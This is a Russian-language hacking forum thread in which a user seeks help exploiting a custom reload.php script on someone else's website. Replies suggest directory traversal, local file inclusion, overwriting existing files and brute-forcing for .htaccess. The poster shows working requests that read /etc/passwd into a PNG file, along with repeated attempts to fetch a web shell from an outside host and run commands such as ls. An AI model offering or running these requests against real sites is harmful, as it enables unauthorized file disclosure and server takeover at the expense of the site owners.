На сервере крутится скрипт gyazo куда при обращении в определенную папку падают скриншоты(в папку db)

http://site.ru/upload.cgi

и создается скрин с хешированным значением

http://site.ru/db/fhckddkjcdfj.png

Так же на сайте есть скрипт reload.php - Исходники мне увы неизвестны, скорее самопис.

При обращении к нему

http://site.com/reload.php?image=htt...g.png.html.ico здесь любое расширение кроме PHP)&type=jpg&title=test123(здесь может быть любое название)&state=new создается в папке db файл уже со своим названием

http://site.ru/test123.png

Проблема в том, что создается файл жестко с png но любыми внутренностями. Хоть php, хоть html - неважно. Загрузить и создать файл со свободными разрешением я не могу, хотя пытался делать такой запрос:

http://site.ru/reload.php?image=htt.../1.php.txt&type=jpg&title=test123.&state=new

Пробовал обрезать нули но выходит пустая страница.

Могу предоставить ссылку в пм по запросу, а если поможете не поленюсь и отблагодарить

directory traversal пробовал? А если указать существующий файл, перепишет его, или добавит новые внутренности к существующим? И еще, параметр type что-то меняет вообще? Можно попробовать еще локальный файл включить.

https://rdot.org/forum/showthread.php?t=343 - хоть там и врятли инклуд, но может помочь(еле нашел эту ссылку)

Пробовал ли я directory traversal? Да. выдает белую страницу, но ничего более. Ни загрузки файлов. ни вывод. Ничего.

Файл перезаписывает. тупо перезаписывает внутреннее содержимое, но не меняет расширение.

параметр type похоже ни на что не влияет, там хоть dLLL2123 укажи - он спокойно зальет картинку или html со стороннего ресурса и переименует в *.png

Вообще, бессмысленно все.

Если не меняет расширения, то можно побрутить папку на предмет существующих файлов(другие php, .htaccess, еще что-то)

так ты не создавай темы, а сразу всё подробно описывай с скринами, с запросами и результатами, нахрена плодить овер много тем ?

Запрос типа:

reload.php?image=/etc/passwd&type=png&title=test&state=new - создает в папке /db/ файл test.png с содержимым /etc/passwd

Если файл отсутствует, то выдает ошибку 404

То есть это локальная читалка файлов где данные записываются в png файл.

Хочу залить шелл но при запросе:

reload.php?image=http://www.shell.com/1.txt&type=png&...hell&state=new - так же создается файл в папке /db/ исключительно в png формате.

Можно ли залить шелл или выполнить удаленно команду если команды не срабатывают и выдают пустую белую страницу?

reload.php?image=http://www.shell.com/1.php&type=png&...hell&state=new

reload.php?image=http://www.shell.com/1.txt&type=png&...hell&state=new

reload.php?image=http://www.shell.com/1.txt?c=ls

попробуй исходники поискать, если найдёшь то там явно больше прояснится

вообще если параметр type не влияет на результат, то скорее всего в коде жёстко прописано расширение, но это не точно

хотя возможно и не нужно искать, попробуй по относительному пути прочитать

Параметр type на результат не влияет, то есть можно без него:

reload.php?image=/etc/passwd&title=blalbalbabla&state=new

reload.php?image=/etc/passwd&type=php&title=blalbalba&state=new

Исходник получил. Базу сайт не использует.

.SpoilerTarget" type="button">Spoiler: code

вот и ответ